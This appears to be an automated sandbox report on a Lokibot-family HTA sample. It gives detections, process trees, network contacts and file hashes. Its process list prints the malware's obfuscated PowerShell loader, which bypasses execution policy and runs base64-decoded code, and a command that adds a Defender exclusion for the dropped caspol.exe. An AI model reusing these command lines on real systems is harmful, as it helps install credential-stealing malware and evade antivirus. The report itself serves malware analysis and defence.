Analysis Overview
SHA256
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
Threat Level: Known bad
The file seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
outlook_win_path
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-18 17:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win7-20240903-en
Max time kernel
134s
Max time network
144s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2352 set thread context of 1624 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta"
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'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'+[ChAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF29.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDF28.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | f94104592811cc91c4a68e8ed0aec140 |
| SHA1 | faf40098525967cc8f3520d866a0d6f159446993 |
| SHA256 | b6c894126b6c2f477fba4afa62030fef985b07261a367e231f512a65d3dbb084 |
| SHA512 | 397d1f0182ad0bf1da1867df4bd859860e9c6bf663edeadf8611a30678301deca6aeeeeb00368f837b79ad9bdcf645d20ac2f695016c49b71094c14e7fb5b282 |
\??\c:\Users\Admin\AppData\Local\Temp\qvmrx4cu.cmdline
| MD5 | f46cb4f9e8e062750ca6490d9df0eee5 |
| SHA1 | c00be5627ece61cd0185fc76183caac998b39226 |
| SHA256 | a715c7bbbd68f4462a82a32e583c4753774c54354eb99fc2bd2c4f177792bca5 |
| SHA512 | d02a0b4d5e55405ef912e3c9f64b65d39138b883f23dc4f101fd8ca4e1c705534d4453c67f8d554b8176cf50f842b1e3feedf2f6ada85afd3d2a6e305da621e7 |
\??\c:\Users\Admin\AppData\Local\Temp\qvmrx4cu.0.cs
| MD5 | f97fc8141f59078b4354b513d3b083ac |
| SHA1 | 293904ab8d5f38a2f0764ee2e35e97e590d8c737 |
| SHA256 | f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e |
| SHA512 | 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c |
\??\c:\Users\Admin\AppData\Local\Temp\CSCDF28.tmp
| MD5 | 20fd58f7b4a27dd951e230b753e4446d |
| SHA1 | 83a3fc556b708880588cb295da35eb50d28ea47d |
| SHA256 | 48606746578b4f8c7b74d9200fa4989c18a8ee687ae90c07c89f4e057f22156f |
| SHA512 | 6d5e9fb666e6d5155134b6c31c93a3f91e84e77c6ebb8233e3a1712c042921505f7c07660bc288c77772920e7e904f477b80831a5d3e15b86f21d8c3f8eff6b3 |
C:\Users\Admin\AppData\Local\Temp\RESDF29.tmp
| MD5 | 171aa8106716a441ce7ee396e96469a9 |
| SHA1 | 595da5491e361cde5e1cb78e09faf214e56d791a |
| SHA256 | 653c38078adefa1f453b14615c04dcfe07ad7bd862c85781afa704aea1d0d289 |
| SHA512 | 7a7a180d7ba7558aa0c69a2f32c9267aaa5c9cc5cd5d83bd2caae36c9bab3ea609bc91aef1cf2981e3be152e5396d7d4eece0767ba56f06b32a3a0fc41f0039b |
C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.dll
| MD5 | e48ea449bdcbae330e4f633102344ed2 |
| SHA1 | a3965ad5e607e8f6ca9da235c5d64d829981dd40 |
| SHA256 | c68f7f5fd86f613254f970375c3c543c4e33fe0180f04db75c2de3e623bb8af1 |
| SHA512 | 83014b98513dfe4fbfc1528aa9176138f2842f1dbaba4ab7a22c8e311b6bec3a42c151cc0b96f10fcba8eaa561530cc411ccb70a4119f627fb6d52cb6cf802e8 |
C:\Users\Admin\AppData\Local\Temp\qvmrx4cu.pdb
| MD5 | c982c21d8a278fb274db38f1e82352da |
| SHA1 | 9d9b8f2af7f7cc14765d6fdc9879da696b967932 |
| SHA256 | 074f193d794ff8217b7a586b4a0976b948ea6735b0a68b14b281f6406c765826 |
| SHA512 | 911a1c9ef9c9c8eb1d41df8e200be39d1563bf5fa61b5e73ce1728000db08ec296e145556a3c6fecfd503b0ca3f3bd09ceb7e0e002bd5fc09201e095a72d0438 |
\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 80358303e33cef71434e6e4a621262c5 |
| SHA1 | e7a22b4e5af741f9b4d9982f36164b276bba459a |
| SHA256 | f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7 |
| SHA512 | 5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e |
memory/2352-35-0x0000000000820000-0x00000000008B4000-memory.dmp
memory/2352-36-0x0000000000470000-0x0000000000482000-memory.dmp
memory/2352-37-0x0000000005950000-0x00000000059B4000-memory.dmp
memory/1624-38-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-40-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-49-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1624-46-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-51-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-44-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1624-42-0x0000000000400000-0x00000000004A2000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3180 set thread context of 1196 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'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'+[ChAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1F8.tmp" "c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\CSC21F546F2CC29440ABFE9B5BCAF7FEEC9.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| US | 8.8.8.8:53 | 231.187.63.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | | tcp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
Files
memory/1448-0-0x000000007136E000-0x000000007136F000-memory.dmp
memory/1448-1-0x0000000002F80000-0x0000000002FB6000-memory.dmp
memory/1448-3-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/1448-2-0x0000000005950000-0x0000000005F78000-memory.dmp
memory/1448-4-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/1448-5-0x0000000005FB0000-0x0000000005FD2000-memory.dmp
memory/1448-7-0x00000000061C0000-0x0000000006226000-memory.dmp
memory/1448-6-0x0000000006150000-0x00000000061B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcme1m0g.mjh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1448-17-0x0000000006330000-0x0000000006684000-memory.dmp
memory/1448-18-0x0000000006840000-0x000000000685E000-memory.dmp
memory/1448-19-0x0000000006890000-0x00000000068DC000-memory.dmp
memory/1488-29-0x0000000007990000-0x00000000079C2000-memory.dmp
memory/1488-30-0x000000006DC20000-0x000000006DC6C000-memory.dmp
memory/1488-40-0x0000000006D90000-0x0000000006DAE000-memory.dmp
memory/1488-41-0x00000000079D0000-0x0000000007A73000-memory.dmp
memory/1488-42-0x0000000008130000-0x00000000087AA000-memory.dmp
memory/1488-43-0x0000000007AE0000-0x0000000007AFA000-memory.dmp
memory/1488-44-0x0000000007B40000-0x0000000007B4A000-memory.dmp
memory/1488-45-0x0000000007D70000-0x0000000007E06000-memory.dmp
memory/1488-46-0x0000000007CE0000-0x0000000007CF1000-memory.dmp
memory/1488-47-0x0000000007D10000-0x0000000007D1E000-memory.dmp
memory/1488-48-0x0000000007D20000-0x0000000007D34000-memory.dmp
memory/1488-49-0x0000000007E30000-0x0000000007E4A000-memory.dmp
memory/1488-50-0x0000000007D60000-0x0000000007D68000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.cmdline
| MD5 | b028c52901cfe4669c90a423ca8f09c5 |
| SHA1 | 3e7df7cc8ee7d97eb79d65564f4608e5f666103a |
| SHA256 | 19020d492a53086bd94faba09d53cb4b185ed9fe446d571f7513a0db5380bb42 |
| SHA512 | 624bd1dc71314f5fab1e50f9ed6bd25b8bfe81e27029f65414fbdc6a1573ce42124fd24e90f52403f30b72ecf54ee969a1ebd4768919863b2414676f21e30a4e |
\??\c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.0.cs
| MD5 | f97fc8141f59078b4354b513d3b083ac |
| SHA1 | 293904ab8d5f38a2f0764ee2e35e97e590d8c737 |
| SHA256 | f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e |
| SHA512 | 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c |
\??\c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\CSC21F546F2CC29440ABFE9B5BCAF7FEEC9.TMP
| MD5 | 400b6bb59408a91f4dff4ce616c1c88b |
| SHA1 | 5c0cd03c6afb814289757e450d26752def0c4706 |
| SHA256 | 977b1e476ce2aa2bbe4434cfe2c0be3060fba012421fccb4d7e3c96a3f9ecd6b |
| SHA512 | a89e7e5b014f053debb538298e0945ddb37531ad22f1848261cfab65f9793118fce0ca45f3b5e9114ac5069378d3605adeffbeb62ead8e39007d874bffcdf12d |
C:\Users\Admin\AppData\Local\Temp\RESC1F8.tmp
| MD5 | 3e69cc8602c6c85ca6b6b1d8e06dd0a0 |
| SHA1 | 861ab2d159be0bb670e4eaba23c65e6cb23e5542 |
| SHA256 | 7684797c6697be2d7771fbeb1398fe8c0b452ef4ab49dad3e6325d52fab6b98f |
| SHA512 | 82e6b52cafa3d5e64707d5fd34bcf4e62fba11ab10a17b72adb9eb28153e312ab84ad4f43145969c32344ab664da704d8589fd3d0dd5915afcaac24b74a28339 |
C:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.dll
| MD5 | 660d42aac5531bde942fb726ae3167ba |
| SHA1 | 257b344999c7c8a44dd9c5dfd2146c5674a6ae10 |
| SHA256 | 5b0f1c89a90eb1d54f25e5dbd6fd00cabbd38f8c5a9de18e6a0d48ee6050dc63 |
| SHA512 | b53ca04ad5dc78ba0795e243a6235fc248039c1719bcfc76b981083b35a537295b6baa8b266a587034ee9f5cd788adcd148d462ba865f39b68c33dd83299df49 |
memory/1448-65-0x0000000006DF0000-0x0000000006DF8000-memory.dmp
memory/1448-67-0x000000007136E000-0x000000007136F000-memory.dmp
memory/1448-68-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/1448-73-0x0000000071360000-0x0000000071B10000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 80358303e33cef71434e6e4a621262c5 |
| SHA1 | e7a22b4e5af741f9b4d9982f36164b276bba459a |
| SHA256 | f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7 |
| SHA512 | 5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWERSHELl.exE.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
